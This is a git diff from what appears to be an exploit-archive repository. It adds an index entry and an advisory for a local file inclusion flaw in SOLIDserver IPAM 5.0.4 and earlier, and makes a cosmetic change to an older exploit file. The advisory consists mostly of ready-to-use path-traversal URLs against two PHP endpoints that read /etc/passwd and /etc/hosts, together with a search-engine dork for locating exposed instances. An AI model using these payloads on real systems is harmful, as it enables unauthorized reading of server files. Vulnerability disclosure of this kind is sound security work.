diff --git a/files.csv b/files.csv index 67816491b..1674a21f4 100755 --- a/files.csv +++ b/files.csv @@ -35715,3 +35715,4 @@ id,file,description,date,author,platform,type,port 39475,platforms/windows/dos/39475.py,"QuickHeal 16.00 - webssx.sys Driver DoS Vulnerability",2016-02-19,"Fitzl Csaba",windows,dos,0 39476,platforms/multiple/dos/39476.txt,"Adobe Flash - SimpleButton Creation Type Confusion",2016-02-19,"Google Security Research",multiple,dos,0 39477,platforms/windows/webapps/39477.txt,"ManageEngine Firewall Analyzer 8.5 - Multiple Vulnerabilities",2016-02-19,"Sachin Wagh",windows,webapps,8500 +39478,platforms/php/webapps/39478.txt,"SOLIDserver <=5.0.4 - Local File Inclusion Vulnerability",2016-02-20,"Saeed reza Zamanian",php,webapps,0 diff --git a/platforms/linux/local/75.c b/platforms/linux/local/75.c index 4e59dfacb..31f4b8290 100755 --- a/platforms/linux/local/75.c +++ b/platforms/linux/local/75.c @@ -96,6 +96,6 @@ else rm -rf ${TMPDIR}/mansh fi exit - - -// milw0rm.com [2003-08-06] + + +// milw0rm.com [2003-08-06] diff --git a/platforms/php/webapps/39478.txt b/platforms/php/webapps/39478.txt new file mode 100755 index 000000000..5d70cbe09 --- /dev/null +++ b/platforms/php/webapps/39478.txt @@ -0,0 +1,33 @@ +Title: SOLIDserver <=5.0.4 - Local File Inclusion Vunerability +Author: Saeed reza Zamanian [penetrationtest @ Linkedin] + +Product: SOLIDserver +Tested Version: : 5.0.4 and 4.0.2 +Vendor: efficient IP http://www.efficientip.com +Google Dork: SOLIDserver login +Date: 17 Feb 2016 + +CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + + +About Product : +--------------- +EfficientIP's IP Address Management (IPAM) solution adapts to business and IT goals and objectives by allowing the creation of specific IPAM and VLANs deployment processes. +SOLIDserverâ„¢ IPAM is a unified solution that allows you to design, deploy, and manage the IP addressing plan automatically applying allocation rules and simplifying deployments. + +Vulnerability Details: +---------------------- +Based on a code review done on the product , this product doesn't have any observation on some parameters, that make the attacker able to read file contents. + +PoC 1: +----- +https://www.site.com/mod/system/report_download.php?report_filename=/etc/passwd +or +view-source:https://www.site.com/mod/system/report_download.php?report_filename=../../../../../../../../../../../../etc/passwd + +PoC 2 : [login authentication required] +------ +https://www.site.com/mod/generic/download_config_file.php?config_file=../../../../../../../../../../../../../../etc/hosts + + +#EOF \ No newline at end of file